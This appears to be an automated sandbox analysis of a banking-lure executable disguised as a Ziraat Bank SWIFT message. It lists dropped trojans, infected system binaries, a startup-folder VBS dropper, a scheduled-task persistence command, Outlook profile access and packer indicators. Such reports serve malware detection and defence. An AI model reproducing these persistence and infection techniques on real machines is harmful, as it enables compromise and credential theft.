Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: uxtheme.dll

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\svchost.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\server02.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Static file information: File size 2267136 > 1048576

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x160800

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: svchost.exe, 00000005.00000003.1284856650.00000000080A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdbGCTL source: svchost.exe, 00000005.00000003.1293877990.0000000008A00000.00000004.00001000.00020000.00000000.sdmp, alg.exe.5.dr
Source:	Binary string: _.pdb source: svchost.exe, 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: spadixes.exe, 00000002.00000003.1280825411.0000000004100000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000002.00000003.1280700151.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001A.00000003.1418690449.0000000004210000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001A.00000003.1423932497.0000000004070000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001D.00000003.1437240120.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001D.00000003.1437571692.0000000003970000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001F.00000003.1448879343.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001F.00000003.1448493328.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000021.00000003.1461716195.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000021.00000003.1462628419.0000000003840000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: spadixes.exe, 00000002.00000003.1280825411.0000000004100000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000002.00000003.1280700151.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001A.00000003.1418690449.0000000004210000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001A.00000003.1423932497.0000000004070000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001D.00000003.1437240120.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001D.00000003.1437571692.0000000003970000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001F.00000003.1448879343.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001F.00000003.1448493328.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000021.00000003.1461716195.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000021.00000003.1462628419.0000000003840000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: svchost.exe, 00000005.00000003.1293877990.0000000008A00000.00000004.00001000.00020000.00000000.sdmp, alg.exe.5.dr

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 5.2.svchost.exe.5800f16.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 5.2.svchost.exe.6fa8b90.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: TrojanAI.exe.5.dr

Static PE information: 0xAA16B5AE [Fri Jun 4 22:50:22 2060 UTC]

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Code function: 0_2_0009E01E LoadLibraryA,GetProcAddress,

0_2_0009E01E

Source: neworigin.exe.5.dr	Static PE information: real checksum: 0x0 should be: 0x480db
Source: TrojanAI.exe.5.dr	Static PE information: real checksum: 0x0 should be: 0x42478
Source: alg.exe.5.dr	Static PE information: real checksum: 0x2096e should be: 0x12e708
Source: server02.exe.5.dr	Static PE information: real checksum: 0x0 should be: 0x2673b

Source: armsvc.exe.5.dr	Static PE information: section name: .didat
Source: alg.exe.5.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_0009288B push 66000923h; retn 000Fh	0_2_000928E1
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000A6B05 push ecx; ret	0_2_000A6B18
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_00089C63 push edi; retn 0000h	0_2_00089C65
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000A8D36 push esi; ret	0_2_000A8D38
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_00089DD8 push F7FFFFFFh; retn 0000h	0_2_00089DDD
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_00E43240 push ss; retf	0_2_00E43244
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_00E43248 push ss; retf	0_2_00E43244
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008E6B05 push ecx; ret	2_2_008E6B18
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008C9C63 push edi; retn 0000h	2_2_008C9C65
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008C9DD8 push F7FFFFFFh; retn 0000h	2_2_008C9DDD
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008E8D36 push esi; ret	2_2_008E8D38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0041C40C push cs; iretd	5_2_0041C4E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00423149 push eax; ret	5_2_00423179
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0041C50E push cs; iretd	5_2_0041C4E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004231C8 push eax; ret	5_2_00423179
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040E21D push ecx; ret	5_2_0040E230
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0041C6BE push ebx; ret	5_2_0041C6BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04BA7DF0 push 04BA7D4Bh; ret	5_2_04BA7D80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04BA7DF0 push 04BA7DD7h; ret	5_2_04BA7D9F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04BA7DF0 push 04BA7D5Fh; ret	5_2_04BA7DB3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04BA7DF0 push 04BA81E6h; ret	5_2_04BA7E2D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04BA7DF0 push 04BA7FCCh; ret	5_2_04BA82BB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04BA7DF0 push 04BA8468h; ret	5_2_04BA852D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04BA8550 push 04BA852Eh; ret	5_2_04BA7F3A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04BA8550 push 04BA8514h; ret	5_2_04BA7F66
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04BA8550 push 04BA7E66h; ret	5_2_04BA8057
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04BA8550 push 04BA817Ah; ret	5_2_04BA808B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04BA8550 push 04BA82E5h; ret	5_2_04BA80D9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04BA8550 push 04BA826Ah; ret	5_2_04BA819E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04BA8550 push 04BA849Ch; ret	5_2_04BA81E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04BA8550 push 04BA8321h; ret	5_2_04BA82E0

Source: spadixes.exe.0.dr

Static PE information: section name: .reloc entropy: 7.871402794637499

Source: 5.2.svchost.exe.5800f16.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'YFZ8A95ybiywH', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 5.2.svchost.exe.6fa8b90.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'YFZ8A95ybiywH', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Persistence and Installation Behavior

Drops executable to a common third party application directory

Source: C:\Windows\SysWOW64\svchost.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\SysWOW64\svchost.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	System file written: C:\Windows\System32\alg.exe			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\server02.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	File created: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\neworigin.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	File created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\svchost.exe

File created: C:\Windows\System32\alg.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:31 /du 23:59 /sc daily /ri 1 /f

Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 5_2_04BACBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

5_2_04BACBD0

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_0009EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0009EB42
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008DEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		2_2_008DEB42

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Code function: 0_2_000A123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_000A123A

Source: C:\Users\user\AppData\Local\Temp\server02.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
